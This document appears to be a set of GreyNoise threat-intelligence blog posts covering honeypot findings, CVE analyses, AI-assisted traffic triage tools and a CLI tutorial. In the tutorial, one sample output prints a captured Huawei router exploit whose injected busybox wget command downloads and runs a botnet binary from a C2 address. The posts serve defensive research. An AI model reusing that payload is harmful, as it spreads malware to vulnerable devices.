C'mon down for an in-depth look at this critical YAML vulnerability!

Mining The Undiscovered Country With GreyNoise EAP Sensors: F5 BIG-IP Edition

Over at the GreyNoise Labs Grimoire, Ron Bowes has a new, deep-dive post out on the creation of a simple clone of the F5 BIG-IP management port to attract traffic and analyze it. Ron deployed the honeypot for a couple of weeks and then analyzed the traffic using tshark.

Some interesting findings include:

  • Brute-force attacks on the login page with basic credentials like “user123” and “password123”.
  • Attempts to exploit CVE-2021-22986, an SSRF issue in the authentication parser.
  • Traffic targeting the “/mgmt/tm/util/bash” endpoint, which is typically targeted for auth-bypass issues like CVE-2022-1388.
  • Two instances of exploitation attempts targeting the “/mgmt/shared/iapp/rpm-spec-creator” endpoint, which is related to CVE-2022-41800, an authenticated remote code execution vulnerability.

Ron does note that the majority of the traffic is not related to a rumored 0-day exploit, and that the honeypot helped provide insights into various attack attempts and vulnerabilities.

Pour out your fav caffeinated beverage and sink into Ron's insightful post!

A Day In The Life Of A GreyNoise Researcher: The Path To Understanding The Remote Code Execution Vulnerability (CVE-2023-50164) In Apache Struts2

Over on the GreyNoise Labs Grimoire, Matthew Remacle (Remy) digs into the newly disclosed Apache Struts2 CVE-2023-50164 file upload vulnerability. This weakness allows an attacker to drop a web shell that can be called remotely through a public interface over defined routes.

Keep an eye on our new tag for CVE-2023-50164.

Remy's analysis highlights the following key points:
  • Apache Struts2 is an open-source Java web application development framework used in various enterprise-grade applications and business use cases.
  • The vulnerability occurs when a multipart form request is used, and the constraints for path normalization are bypassed.
  • The attacker can inject a web shell (e.g., shell.jsp) into the file system, which can then be remotely called.
  • The exploitation of this vulnerability depends on the specific implementation of Apache Struts2 in a vendor's product and the defined actions' path.

In the coming weeks, GreyNoise and the extended research community are expected to investigate vendor and product-specific implementations leveraging Apache Struts2 to determine the exact path that must be traversed to drop a web shell in those products and call it remotely through a public interface over the defined routes.

Using GreyNoise EAP Sensors For Novel Exploitation Discovery For CVE-2023-47246

In a new GreyNoise Labs’ blog post, researcher Jacob Fisher (a.k.a. h0wdy) explored the use of our new Early Access Program (EAP) dynamic sensors to catch a new proof of concept (PoC) for CVE-2023-47246 — a path traversal vulnerability leading to remote code execution (RCE) in SysAid On-Premise software.

In it, Jacob discusses the importance of reactive honeypots/sensors for obtaining accurate and comprehensive packet captures, along with his methodology for digging into the gory details of real-world service exploitation. This work helped create our new tag for this exploit.

Discover how dynamic honeypots can help you stay ahead of emerging threats, and learn from Jacob’s experience with this novel vulnerability.

CVE-2023-49103: ownCloud Critical Vulnerability Quickly Exploited in the Wild

2023-11-30 UPDATE

Ron Bowes of the GreyNoise Labs team has made some updates to the deep dive into this critical vulnerability in ownCloud’s Graph API.

2023-11-29 UPDATE

Ron Bowes of the GreyNoise Labs team has put together a deep dive into this critical vulnerability in ownCloud’s Graph API. Ron discusses the exploit, its impact on Docker installations, and our comprehensive testing process, here at GreyNoise.


2023-11-27 ORIGINAL POST

On November 21, 2023, ownCloud publicly disclosed a critical vulnerability with a CVSS severity rating of 10 out of 10. This vulnerability, tracked as CVE-2023-49103, affects the "graphapi" app used in ownCloud. 

ownCloud is a file server and collaboration platform that enables secure storage, sharing, and synchronization of commonly sensitive files.

The vulnerability allows attackers to access admin passwords, mail server credentials, and license keys. 

GreyNoise has observed mass exploitation of this vulnerability in the wild as early as November 25, 2023.

The vulnerability arises from a flaw in the "graphapi" app, versions 0.2.0 through 0.3.0. This app utilizes a third-party library that reveals sensitive PHP environment configuration, including passwords and keys. Disabling the app does not entirely resolve the issue, and even non-containerized ownCloud instances are at risk. Docker containers from before February 2023 are not affected. 

Mitigation information listed in the vendor's disclosure includes manual efforts such as deleting a directory and changing any secrets that may have been accessed.

In addition to CVE-2023-49103, ownCloud has also disclosed other critical vulnerabilities, including an authentication bypass flaw (CVE-2023-49105) and a critical flaw related to the oauth2 app (CVE-2023-49104). 

Organizations using ownCloud should address these vulnerabilities immediately. 

Quickly Triaging HTTP Traffic From GreyNoise’s New Hosted Sensors

Our new hosted sensor fleet is cranking out PCAPs for those lucky folks who made it into the first round of our Early Access Program. These sensors enable you to give up a precious, internet-facing IPv4 address and have it automagically wired up to your choice of persona. These personas can be anything from a Cisco device to a camera, and anything in between.

While there’s a fancy “PCAP analyzer” feature “coming soon” to the GN Visualizer and API, I’ve been mostly using a sensor that’s tucked away in a fairly quiescent part of the internet to quickly triage HTTP requests to see if we can bulk up our Tag (i.e., an attack/activity detection rule) corpus with things we may have missed in the sea of traffic we collect, tag, and triage every day.

Sure, Sift helps quite a bit with identifying truly horrific things, but occasionally a quick human pass at HTTP paths, headers, and POST bodies will either identify something we may have previously missed, or cause us to think a bit differently and start identifying more of the noise. This is how our recent “security.txt scanner 🏷️” and robots.txt scanner 🏷️ were birthed.

We've posted a detailed write-up on one way to do this over on the GreyNoise Labs Grimoire. Check it out and share your analyses, or alternate ways you process these PCAPs, in the Community Slack!

Introducing Sift: Automated Threat Hunting

TLDR:

GreyNoise is exposing a new internally developed tool, Sift, to the public for the first time. Sift curates a report of new/interesting traffic observed by GreyNoise sensors daily after doing much of the analysis and triage work itself.

Note that it is a new and experimental feature and will probably have some bugs and change without warning. We will soon be integrating direct marker.io feedback capability. For now, please direct all feedback to labs@greynoise.io. We really want to know what you think!

Figure 1: Example Sift Report

Threat Hunter Pain

There is a lot of traffic bouncing around the internet. Full stop. GreyNoise sees ~2 million HTTP requests (along with tens of millions of events from other protocols) a day. For our on-staff Detection Engineers and your engineers and analysts facing similar loads, analyzing millions of HTTP requests can be extremely tiresome and stressful. 

It’s like looking for a needle in a haystack each day. Most of them are harmless, but some could be hiding malicious activity. It’s a tedious and time-consuming process of constantly sifting through payloads of data, and the fear of overlooking something dangerous adds a layer of stress. The task is mentally exhausting, and the perpetual strain can make it a painful experience, with the constant awareness that a single mistake could have serious consequences.

Introducing Sift

To help provide a painkiller, we’ve created Sift. Sift is a workflow that attempts to remove the noise of the background traffic and expose new and relevant traffic. Additionally, it describes the interesting traffic, tells you if it might be a threat, and prioritizes what payloads to look at first. Identification, explanation, and triage all in one tool. 

To achieve this, we employ several advanced DS/ML/AI techniques, such as:

  • custom-built LLMs (Large Language Models)
  • nearest neighbor search and vector databases
  • unsupervised clustering and prompt engineering
  • RAG (Retrieval Augmented Generation)
  • querying state-of-the-art generative models for additional analysis

The result is a daily report of what GreyNoise sees across our vast sensor network, distilled down to only the new items, with built-in analysis that gives every defender an immediate look into what is really happening on the internet, without needing the luck of an analyst stumbling upon an attack in log traffic.

Currently, it is limited to HTTP traffic, but that won’t last long. It is an experimental feature on the bleeding edge of what is possible, so please bear with us as errors inevitably occur.

Directing Attention

As said earlier, GreyNoise sees millions of HTTP requests a day. After months of experimentation, we found several techniques to record, clean, dedupe, and convert this data into a numerical format for analysis. Applying this to our significant dataset of internet traffic, we’re able to automatically tell you what is new today vs. what we have seen in the last several weeks. This process effectively makes a noise filter for traffic.

In practice, our process takes ~2 million HTTP events down to ~50 per day that require an analyst to look at. Now, we can actually find the needles in our proverbial haystack scientifically and give our analysts a reasonable workload. This reduction in noise has dramatically improved the quantity of new Tags we can generate every week.

Explaining and Sorting

Once we’ve narrowed our focus, we can employ some of the more costly techniques of commercial large language models to help us answer specific questions about the payloads we’re considering. Without giving away all of our techniques, we can generate: an analysis of the payload; associated CVEs and CPEs (which are more up-to-date than any language model); a score for how big of a threat it might be; what GreyNoise knows about the IPs (tags/RIOT/etc.); a score for how confident we are; Suricata queries that might detect similar payloads; and keywords, techniques, and technologies affected.

In short, we’re trying to build an entire analyst report on the fly for only things you should look at. Additionally, we sort the reports, so you look at the most critical threats first.

Future Possibilities

Sift is brand new and full of possibilities. You can help flesh those out. We’re currently only exposing daily reports from the last month (excluding the previous week). 

  • Would you like to see more reports? (e.g., Back in time or up to the current date?)
  • More tailored to your organization? (We are rolling out user-hosted sensors where you can get data that a Sift report could eventually filter. More info to come soon..)
  • Would you submit a PCAP to get a Sift report on it?
  • Is there other information you’d want in a report?

Welcome to GreyNoise Labs!

As autumn quickly approaches in the Northern Hemisphere, many people see this as a time to turn inward and prepare for the long winter ahead. However, this is also a time when the lush, uniform green flora around us transforms into a kaleidoscope of colors. This change helps give us all a renewed perspective on what is all around us and fuels both an appreciation for what we have and creativity for what is possible.

Today, GreyNoise is excited to officially announce the emergence of GreyNoise Labs. Keen-eyed GreyNoise users may have noticed our soft launch of this throughout 2023.

Now, like the autumn leaves, we're adding even more color to the existing knowledge and insight that GreyNoise already provides, which governments, critical infrastructure, Fortune 100 enterprises, and security researchers rely on daily to help defend us all against cyberattacks.

What can you expect from GreyNoise Labs?

You already know one of our goals: to provide early access to new data, tools, and insights we're developing — things that may eventually become integrated into our core product but need testing, feedback, and real-world use.

All the teams at GreyNoise provide product, company, community, and emerging threat information via our primary communication channel. This is still the place to keep your finger on the pulse of what's happening at GreyNoise and in the internet threat landscape. If the GreyNoise blog's RSS feed isn't already in your favorite newsreader, we highly recommend adding it right now!

That is still the place where critical, actionable information associated with emerging threats will first be published. However, we often need to go deeper into a particular vulnerability or exploit. We also have much more to say on security research projects we're undertaking, data science initiatives we're investigating, and cutting-edge detection engineering concepts we're pioneering.

Our new Grimoire blog (Grimoire RSS) is the place for these deeper dives. We'll make sure to link to them if we have more to say about any emerging threats we direct your attention to on the core blog.

The GreyNoise Labs API is part of our internal Blueprints initiative. Our Product, Design, and Engineering teams build, maintain, and enhance resilient and robust systems/applications you rely on daily. Our Labs team is charged with developing new ways to process and present the data we collect, curate, and compute. These ideas are codified into "blueprints," which are — by definition — "something intended as a guide for making something else." These may take the form of a new Labs API or greynoiselabs command line endpoint, alternate ways to view our data, different idioms for interacting with our core services, or just ways to help you see how we think about the data we work with.

We'll also be regularly updating resources we rely on and giving folks a bit more insight into the team behind GreyNoise Labs. Curious about what we do, what we've published, or the APIs we've made available? Drop us a note at labs@greynoise.io.

Fast-Tracking Innovation: GreyNoise Labs Experimental CLI

Introducing the GreyNoise Labs Python CLI package: a robust toolkit for advanced users seeking to maximize the potential of our experimental Labs services.

Cybersecurity data analysis is a complex and rapidly evolving landscape. To stay ahead, power users need tools that offer swift and accurate data handling. That's where the new GreyNoise Labs CLI package comes in. Crafted to optimize the parsing and manipulation of our sensor datasets, this CLI will not only expedite your process but also deliver digestible insights right at your fingertips.

Diving Into The Toolkit

The package serves as a conduit to the GreyNoise Labs API service, facilitating direct access to raw sensor data, contextual metadata, and quick prototyping utilities. This powerful Python package is your key to unlocking a simpler, more efficient interaction with our Labs API.

The GreyNoise Labs API contains the top 1% of data for all queries. However, the fluid nature of our continuous iteration and experimentation means that queries and commands can change without prior notice, and a rate limit is in place for equitable usage. While these utilities are primarily intended for us to explore new concepts and gather valuable user feedback, you're welcome to use them. We do caution against integrating them directly into production tools.

Our objective is to identify and prioritize new product features through these experimental iterations and your feedback. This exploratory process allows us to deliver features that not only cater to your specific needs, but also seamlessly integrate with our products.

For more insight into GreyNoise Labs and the work we're doing, visit our official website.

Installing ‘greynoiselabs’

The CLI installation process is straightforward:

  1. Run python3 -m pip install greynoiselabs
  2. Run greynoiselabs init to authenticate with Auth0 (what we use for secure authentication for your GreyNoise account) and save your credentials for future use.

As an optional step, we recommend installing jq to enhance the readability of CLI output. You can install jq with brew install jq on macOS or apt-get install jq on Ubuntu.

Quick Start Guide

Once installed, you can explore the features of the CLI by running greynoiselabs, which provides a handy usage guide.

image showing output of running greynoiselabs without options

Furthermore, you can access command-specific help using greynoiselabs <command> --help.

image showing help for greynoiselabs knocks

These commands can help you explore a variety of rich datasets released by GreyNoise Labs. Remember, the data is easily parseable with jq, which can help you extract insights and filter results to suit your specific needs. Some examples of jq usage are provided later on.

# This gives a JSON response containing data about specific source IPs.
greynoiselabs c2s | jq

{
  "source_ip": "1.2.3.4",
  "hits": 2024,
  "pervasiveness": 10,
  "c2_ips": [
    "5.6.7.8"
  ],
  "c2_domains": [],
  "payload": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n…$(/bin/busybox wget -g 5.6.7.8 -l /tmp/negro -r /.oKA31/bok.mips; /bin/busybox chmod 777 /tmp/negro; /tmp/negro hw.selfrep)…\r\n\r\n"
}
# This command provides insights into knocks on specific source IPs.
greynoiselabs knocks | jq
{
  "source_ip": "36.70.32.117",
  "headers": "{\"Content-Type\":[\"text/html\"],\"Expires\":[\"0\"],\"Server\":[\"uc-httpd 1.0.0\"]}",
  "apps": "[{\"app_name\":\"Apache HTTP Server\",\"version\":\"\"}]",
  "emails": [],
  "favicon_mmh3_128": "Sgqu+Vngs9hrQOzD8luitA==",
  "favicon_mmh3_32": -533084183,
  "ips": [
    "10.2.4.88",
    "10.2.2.88"
  ],
  "knock_port": 80,
  "jarm": "00000000000000000000000000000000000000000000000000000000000000",
  "last_seen": "2023-07-21T11:00:06Z",
  "last_crawled": "2023-07-22T00:14:27Z",
  "links": [],
  "title": "NETSurveillance WEB",
  "tor_exit": false
}
# This shows the most popular IPs.
greynoiselabs popular-ips | jq
{
  "ip": "143.244.50.173",
  "request_count": 916,
  "users_count": 95,
  "last_requested": "2023-07-27T23:55:17Z",
  "noise": true,
  "last_seen": "2023-07-27T23:59:11Z"
 }
# This allows you to see the noise ranking of a specific IP.
greynoiselabs noise-rank | jq
{
  "ip": "167.94.138.35",
  "noise_score": 89,
  "country_pervasiveness": "very high",
  "payload_diversity": "med",
  "port_diversity": "very high",
  "request_rate": "high",
  "sensor_pervasiveness": "very high"
}
# This uses a GPT prompt to generate different results on each run.
greynoiselabs gengnql "Show malicious results that are targeting Ukraine from Russia"

classification:malicious AND metadata.country:Russia AND destination_country:Ukraine
metadata.country:Russia AND destination_country:Ukraine AND classification:malicious
metadata.country_code:RU AND destination_country_code:UA AND classification:malicious
classification:malicious AND metadata.country_code:RU AND destination_country_code:UA
destination_country:Ukraine AND metadata.country:Russia AND classification:malicious

Advanced Usage

jq is a versatile tool for handling JSON data from the command line. Here are a few examples using the JSON outputs above that could provide some interesting insights. Note that these examples are based on the provided samples and may need to be adjusted based on the actual structure and content of your data.

Get a count of all unique C2 IPs

If you wanted to see how many unique C2 IPs exist in your dataset, you could run:

greynoiselabs c2s | \
  jq -s '[.[].c2_ips[]] | unique | length'
149


which retrieves all the C2 IPs (.[].c2_ips[]), finds the unique values (unique), and then counts them (length).

Identify IPs with high hit counts

If you're interested in the source IPs with high hit counts, you could use a command like:

greynoiselabs c2s | \
  jq 'select(.hits > 1000) | .source_ip'
"141.98.6.31"
"194.180.49.165"
"45.88.90.149"
"59.7.196.80"
"61.78.140.229"
"211.194.241.110"
"121.185.173.56"

This filters the data to only include records where the hits are greater than 1000 (select(.hits > 1000)), and then outputs the corresponding source IPs (source_ip).

Grouping by Noise Score

If you wanted to see how many IPs fall into different categories based on their noise score, you could run:

greynoiselabs noise-rank | \
  jq -s 'group_by(.noise_score) | map({noise_score: .[0].noise_score, count: length})'
[
  {
    "noise_score": 40,
    "count": 181
  },
  {
    "noise_score": 41,
    "count": 200
  },
  {
    "noise_score": 42,
    "count": 171
  }
]

This command groups the data by the noise score (group_by(.noise_score)), and then transforms it into an array with each object containing the noise score and the count of IPs with that score (map({noise_score: .[0].noise_score, count: length})).

Identify All Noiseless Popular IPs

If you wanted to see all popular IPs that are not observed by GreyNoise sensors, you could use:

greynoiselabs popular-ips | \
  jq 'select(.noise == false) | .ip'
"13.107.138.8"
"87.103.240.204"
"91.243.167.69"
"13.107.136.8"
"204.79.197.200"
"194.145.175.59"
"52.113.194.132"
"189.95.160.50"

This command filters the data to only include records where the noise is false (select(.noise == false)), and then outputs the corresponding IPs (ip).

Aggregate KnockKnock Source IPs by HTTP Title

For a glimpse into the distribution of page titles across your network traffic, use:

greynoiselabs knocks | \
  jq -s 'map(select(.title != ""))
    | group_by(.title)
    | map({title: .[0].title, source_ips: map(.source_ip), ip_count: length})
    | sort_by(-.ip_count)'
[
  {
    "title": "RouterOS router configuration page",
    "source_ips": [
      "103.155.198.235",
      "185.99.126.15",
   …
      "103.58.251.213"
    ],
    "ip_count": 81
  },
  {
    "title": "main page",
    "source_ips": [
      "220.84.204.83",
      "118.37.197.253",
     …
      "119.200.155.99"
    ],
    "ip_count": 58
  },
 …
]

This command does the following:

  • map(select(.title != "")): Filters out the objects that have an empty title.
  • group_by(.title): Groups the remaining objects by their title.
  • map({title: .[0].title, source_ips: map(.source_ip), ip_count: length}): Transforms the grouped data into an array of objects, each containing a title, an array of associated source IPs, and a count of those IPs (ip_count).
  • sort_by(-.ip_count): Sorts the array of objects based on the ip_count in descending order.

By grouping the knocks data by title, this command lets you quickly identify which titles have the most associated source IPs. The result is sorted by ip_count, giving you an ordered view from the most to the fewest associated IPs per title.

The Power Of Data

Finally, with this, you can start to see the power of this data. The first result is a list of IPs likely running MikroTik routers that are scanning and crawling the internet, likely as part of one or more botnets. Our knockknock dataset has a bunch of granular signature information that could be used to further identify clusters of similar IPs. We will have more on this in a future blog post.
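For example, to pull just those likely-MikroTik source IPs into a plain list (say, to feed a blocklist), you can filter on the title we saw above:

greynoiselabs knocks | \
  jq -r 'select(.title == "RouterOS router configuration page") | .source_ip'

The -r flag emits bare IPs, one per line, ready for whatever tooling you pipe them into.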

These are just a few examples of what you can do with jq and the new GreyNoise Labs CLI output data. By adjusting these examples to your needs, you can glean a multitude of insights from your data and ours.

As we continue to evolve and expand the functionality of the GreyNoise Labs API and CLI, we are eager to hear your feedback. Your input is critical in helping us understand which features are most valuable and what other capabilities you'd like to see included.

Please don't hesitate to reach out to us with your feedback, questions, or any issues you may encounter at labs@greynoise.io. Alternatively, you can create an issue directly on our GreyNoise Labs GitHub page. If you have ideas about ways to combine our data into a more useful view, or you have a dataset you would be interested in partnering with us on, please reach out.

We can't wait to see what you'll discover with the GreyNoise Labs CLI. Get started today and let us know your thoughts!

While our Labs API data is spiffy, you, too, can take advantage of our core data science-fueled threat intelligence platform to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems.

Data Science-Fueled Tagging From GreyNoise Last Week

All our tags come from extremely talented humans who painstakingly craft detection rules for emergent threats that pass our “100%” test every time. We tend to rely on proof-of-concept (PoC) code shared by research partners, or on vendor/researcher write-ups, to determine where we should direct our efforts. Sometimes, prominent, emergent CVEs will cause us to dig into the patch diffs ourselves, fire up vulnerable instances of the software, and determine likely exploit paths, then watch to see whether we were correct.

However, we receive millions of HTTP/HTTPS events alone every single day. Deep within that noise, we know exploitation attempts for other services exist, but surfacing the ones that may matter is a challenge, since we're only human. Thankfully, we also spend some of our time on data science projects that help fuel innovation. You've seen the results of those efforts in our IP Sim and Tag Trends platform features. But we have many internal data science projects designed to give our researchers bionic tagging powers, enabling each of them to be stronger, better, and faster when it comes to identifying novel traffic and understanding whether it is malicious (and whether it warrants a tag).

One of these tools is “Hunter” (yes, the Labs team is quite unimaginative when it comes to internal code names). It performs a daily clustering of HTTP/HTTPS traffic, sifting through those millions of events, and surfaces a very manageable handful of clusters that our dedicated team can easily and quickly triage. Hunter also has a memory of past clusters, so it will only surface “new” ones each day.

Last week was bonkers when it comes to the number of tags (7) our team cranked out.

One reason for that Herculean number is Hunter! It led us to activity that we might otherwise have tagged only much later, after organizations or agencies announced exploit campaigns that had already done real harm to those who fell victim to attack.

In the tag round-up for last week, below, we note where Hunter was the source for the creation of the tag with a “🔍”.

A trio of tags for SonicWall

SonicOS TFA Scanner 🔍

The SonicOS TFA Scanner tag identifies IP addresses scanning for the SonicWall SonicOS Two Factor Authentication (TFA) API endpoint. So far, we've observed 503 unique IP addresses from benign scanners searching for this endpoint. For more information and to explore the data, check out the GreyNoise Visualizer for SonicOS TFA Scanner.

SonicWall Auth Bypass Attempt

This tag is related to IP addresses attempting to exploit CVE-2023-34124, an authentication bypass vulnerability in SonicWall GMS and Analytics. No exploit attempts have been observed so far. For more details, visit the GreyNoise Visualizer entry for SonicWall Auth Bypass Attempt.

SonicWall SQL Injection Attempt

We've observed one malicious IP address attempting to exploit CVE-2023-34133, a SonicWall SQL injection vulnerability. So far, we've seen a single IP, 94[.]228[.]169[.]4, poking around for vulnerable instances. To learn more about this tag and the associated data, have a look at the GreyNoise Visualizer entry for SonicWall SQL Injection Attempt.

A dastardly dynamic duo for Ivanti

Ivanti MICS Scanning

This tag is associated with IP addresses scanning for Ivanti MobileIron Configuration Services (MICS). As of now, we haven't observed any exploitation attempts associated with this scanning. To dive deeper into this tag, visit the GreyNoise Visualizer for Ivanti MICS Scanning.

Ivanti Sentry Auth Bypass Attempt

IP addresses with this tag have been observed attempting to exploit CVE-2023-38035, an authentication bypass vulnerability in Ivanti Sentry, formerly known as MobileIron Sentry, versions 9.18 and prior. No exploit attempts have been observed to date. Explore this tag further on the GreyNoise Visualizer entry for Ivanti Sentry Auth Bypass Attempt.

Solo tags

Openfire Path Traversal Attempt activity

IP addresses with this tag have been observed attempting to exploit CVE-2023-32315, a path traversal vulnerability in Openfire's administrative console. We've caught seven IPs attempting to reach paths they should not be in. You can check those out at the GreyNoise Visualizer entry for Openfire Path Traversal Attempt.

TBK Vision DVR Auth Bypass activity 🔍

Finally, IP addresses with this tag have been observed attempting to exploit CVE-2018-9995, an authentication bypass vulnerability in TBK DVR4104 and DVR4216 devices. Looking back at the past 30 days of data, we found 66 IPs looking for these streaming systems. You can find them all at the GreyNoise Visualizer entry for TBK Vision DVR Auth Bypass.

So What?

The earlier we can find and tag new, malicious activity, the more quickly our customers and community members can take advantage of our timely threat intelligence, whether to buy time to patch systems or to block malicious activity.

You, too, can take advantage of our data science-fueled threat intelligence platform to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems.

Do you have a tag that you want GreyNoise to look into? You are in luck! We now have a page for our Community to request a tag. Check it out.

How to Create Actionable Intelligence with AI and Machine Learning

AI/ML and cybersecurity go together like peanut butter and bananas. You might not think it’s a fit, but it can work out great if you’re into it.

I recently did a talk with Centripetal and wanted to share some highlights as well as the entire video below. This covers a few themes, such as: “how has ML been used in cybersecurity in the past”, “what are the problems with it”, “why we need to use it”, “how to use it responsibly”, and “what to do with all these GPTs”.

If you’re interested in watching it in full, here is the talk.

ML In Security

One of the first use cases for ML in security was spam filtering in early email clients in the late 90s. This was a simple bag-of-words + naive Bayes approach, but it has gotten much more sophisticated over time.

More recently, ML has been used to build malware detection models. Almost all anti-malware engines in VirusTotal have some ML component.

It has also been used in outlier detection (determining spikes in logs/alerts/traffic) and in rule or workflow generation.

What’s The Problem?

However, it’s not all sunshine, roses, and solved problems. ML has some trust issues, especially when it comes to cybersecurity. Models are never perfect and can create False Negatives and False Positives. 

False Negatives are when we fail to detect something as bad when it is indeed bad: a miss. This has the obvious problem of allowing something malicious to act on your system or network without your knowledge.

False Positives are when we call a non-malicious thing bad. This can be just as big an issue, as it creates unnecessary alerts, leading to alert fatigue and, ultimately, to ignored alerts, which lets actual malicious activity slip through the cracks.

Cybersecurity has a very low tolerance for both types of errors, and therein lies the issue. ML solutions have to be very, very good at detection without creating too much noise. They also have to provide context for why the ML tool made its determination. 

Why Bother?

It might seem like a pain to use complicated tools like ML/AI, but the brutal truth is that we have to. There is too much data to work through. GreyNoise sees over 2 million unique HTTP requests a day, and that’s just one protocol.

Plus, bad actors aren’t slowing down. Verizon’s DBIR recorded 16k incidents and 5k data breaches last year, and that is merely what was reported. There are roughly 1,000 entries in CISA’s Known Exploited Vulnerabilities catalog floating around (side note: GreyNoise has tags for almost all of them).

There is no getting around it: we need to use ML/AI technology to handle the load of information and to become better at defense.

How To Use It

Here I hope to give some practical advice on developing ML/AI tools. It really comes down to two main deliverables: Confidence and Context.

By “Confidence” I don’t mean the ROC score of your model or the confusion matrix results. I mean a score you can produce for every detection/outlier/analysis that you surface. For numerous ML applications, a decent analog comes right out of the box: the [0.0, 1.0] score produced by a classification model, the number of standard deviations off the norm, the percent likelihood of an event happening. These all work well, and you can provide guidance on how to interpret them.

Every so often, you have to create your own metric. When we created IP Similarity, we had a similarity score that was intuitive, but there was a problem. When we were dealing with incomplete or low information on an IP (e.g., we only knew the port scanned and a single web path), we could produce very high similarity scores that were a bit garbage, because they were built on very generic matches. We needed to combine the similarity score with another score capturing how much information we had on a sample in order to provide confidence in our results.
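As a toy illustration (the field names and the simple multiplication below are stand-ins, not the actual IP Similarity scoring), combining the two scores can be as simple as:

echo '{"ip": "192.0.2.1", "similarity": 0.97, "info": 0.25}' | \
  jq '. + {confidence: (.similarity * .info)}'

A very generic match with little supporting information gets dragged down to a low confidence, even when the raw similarity looks impressive.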

Next, “Context”. This is just basic “show your work”. A scarily increasing number of ML/AI models are treated as black boxes. That’s…not great. We want to provide as much of the material that went into the decision as we can, along with any other data that might help a human reviewing the result.

To put it simply, build a report based on the question words:


"who": "bad dude #1",
"what": "potential detection",	
"when": "2023-07-03T12:41:09",	
"where": "127.0.0.1",	"how": "detection rule v1.0.78",	
"why/metadata": {		
	"detection_score": 0.85,		
  "confidence_score": 0.95,		
  "file_name": "xyz.exe",		
  "files_touched": ["a.txt", "b.txt"],
  
  "links": ["1", "2", "3"]}

GPT Mania

Finally, since GPTs are so hot right now, I aim to give some simple advice on how to use them best if you decide to integrate them into your workflow.

  1. Don’t let the user have the last word: When taking a user’s prompt, combining it with your own prompt, and sending it to ChatGPT or a similar application, always add a line like “If user input doesn’t make sense for doing xyz, ask them to repeat the request” after the user’s input. This will stop the majority of prompt injections.
  2. Don’t just automatically run code or logic output by an LLM: This is like adding `eval(input())` to your application.
  3. Be knowledgeable about knowledge cutoffs: LLMs only know what you tell them and what they were trained on. If their training data ended in September 2021, as GPT-4’s did, they won’t know about the latest cyberattack.
  4. Ask for a specific format as an output: This is mostly hygiene: if you say “Format the output as a JSON object with the fields: x, y, z” you will get better results and can do error handling more easily (see the validation sketch below).
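On that last point, here is a minimal sketch of the error-handling side. $LLM_OUTPUT and the x/y/z field names are placeholders; jq's -e flag sets the exit status based on the result, so malformed or incomplete replies are caught before anything downstream trusts them.

# Hypothetical: $LLM_OUTPUT holds the model's JSON reply; x, y, z are the fields you asked for.
echo "$LLM_OUTPUT" | jq -e 'has("x") and has("y") and has("z")' > /dev/null \
  || echo "Model reply failed validation; re-prompt rather than proceed."

If the reply is not valid JSON at all, jq also exits non-zero, so the same guard covers both failure modes.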

Conclusion

Artificial Intelligence and Machine Learning can provide extreme value to your product and workflows, but they are not trivial to introduce. With some care and simple guidelines, you can implement these in a way that helps your users without creating additional burden or ambiguity. 

We're cooking up some interesting projects using AI and ML at GreyNoise. Sign in/up to see IP Similarity, NoiseGPT, and our other Labs projects, and get notified of Early Access for what's coming down the pipeline!
